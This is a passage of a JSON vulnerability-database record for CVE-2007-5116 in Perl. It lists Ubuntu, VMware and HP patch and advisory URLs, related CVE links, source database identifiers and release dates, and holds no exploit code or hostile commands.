            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.8-7ubuntu3.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.8-7ubuntu0.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.8-6ubuntu0.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.8-7ubuntu0.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.8-7ubuntu3.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.8-7ubuntu3.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.7-10ubuntu1.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.8-7ubuntu0.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.7-10ubuntu1.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.8-6ubuntu0.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.7-10ubuntu1.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.8-6ubuntu0.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5269"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2741"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5135"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0160"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2026"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5268"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5266"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2445"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0338"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5269"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5849"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1536"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-3108"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1969"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-1536"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5266"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2741"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1205"
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1664"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0338"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/glsa/glsa-201412-11.xml"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2026"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-0720"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2877"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0339"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1969"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2445"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1205"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-0720"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-4995"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5849"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4995"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2877"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5268"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0339"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1664"
          },
          {
            "trust": 0.1,
            "url": "https://bugs.gentoo.org."
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/advisories"
          },
          {
            "trust": 0.1,
            "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4572"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/esx/esx-2.5.5-65742-upgrade.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx350-200712405-sg.zip"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx-1002975.tgz"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx-1002969.tgz"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1002969"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1002971"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/resources/techresources/726"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx-1002972.tgz"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1002964"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5398"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5135"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx-1002968.tgz"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1003208"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/security"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1003205"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx350-200712402-sg"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/esx/esx-2.5.4-65752-upgrade.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5191"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1002972"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx-1002976.tgz"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/download/vi/vi3_patches.html"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx350-200712404-sg.zip"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx-1002970.tgz"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4572"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx-1002962.tgz"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1003206"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1002968"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx-1002971.tgz"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1003204"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/support/policies/security_response.html"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1002975"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/support/esx25/doc/esx-255-200712-patch.html"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3108"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1002970"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/support/esx25/doc/esx-254-200712-patch.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/download/vi/vi3_patches_35.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/download/esx/esx2_patches.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/support/policies/eos.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5360"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5360"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1003176"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx350-200712403-sg.zip"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5398"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1002962"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx-1003176.tgz"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vi/esx-1002964.tgz"
          },
          {
            "trust": 0.1,
            "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5191"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/support/policies/eos_vi.html"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1002976"
          },
          {
            "trust": 0.1,
            "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
          },
          {
            "trust": 0.1,
            "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
          },
          {
            "trust": 0.1,
            "url": "http://www.itrc.hp.com/service/patch/patchdetail.do?patchid=perl_v51bb27-es-20080207"
          },
          {
            "trust": 0.1,
            "url": "http://h30046.www3.hp.com/subsignin.php"
          },
          {
            "trust": 0.1,
            "url": "http://www.itrc.hp.com/service/patch/patchdetail.do?patchid=t64kit1001399-v51bb26-es-20071207"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-28478"
          },
          {
            "db": "BID",
            "id": "26350"
          },
          {
            "db": "PACKETSTORM",
            "id": "60738"
          },
          {
            "db": "PACKETSTORM",
            "id": "60792"
          },
          {
            "db": "PACKETSTORM",
            "id": "61507"
          },
          {
            "db": "PACKETSTORM",
            "id": "129524"
          },
          {
            "db": "PACKETSTORM",
            "id": "60703"
          },
          {
            "db": "PACKETSTORM",
            "id": "62911"
          },
          {
            "db": "PACKETSTORM",
            "id": "63867"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-104"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000796"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-5116"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-28478",
            "ident": null
          },
          {
            "db": "BID",
            "id": "26350",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "60738",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "60792",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "61507",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "129524",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "60703",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "62911",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "63867",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-104",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000796",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2007-5116",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2007-11-07T00:00:00",
            "db": "VULHUB",
            "id": "VHN-28478",
            "ident": null
          },
          {
            "date": "2007-11-05T00:00:00",
            "db": "BID",
            "id": "26350",
            "ident": null
          },
          {
            "date": "2007-11-07T04:20:16",
            "db": "PACKETSTORM",
            "id": "60738",
            "ident": null
          },
          {
            "date": "2007-11-08T23:30:15",
            "db": "PACKETSTORM",
            "id": "60792",
            "ident": null
          },
          {
            "date": "2007-12-06T04:25:51",
            "db": "PACKETSTORM",
            "id": "61507",
            "ident": null
          },
          {
            "date": "2014-12-12T17:43:12",
            "db": "PACKETSTORM",
            "id": "129524",
            "ident": null
          },
          {
            "date": "2007-11-06T06:59:51",
            "db": "PACKETSTORM",
            "id": "60703",
            "ident": null
          },
          {
            "date": "2008-01-24T04:04:26",
            "db": "PACKETSTORM",
            "id": "62911",
            "ident": null
          },
          {
            "date": "2008-02-21T04:45:39",
            "db": "PACKETSTORM",
            "id": "63867",
            "ident": null
          },
          {
            "date": "2007-11-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200711-104",
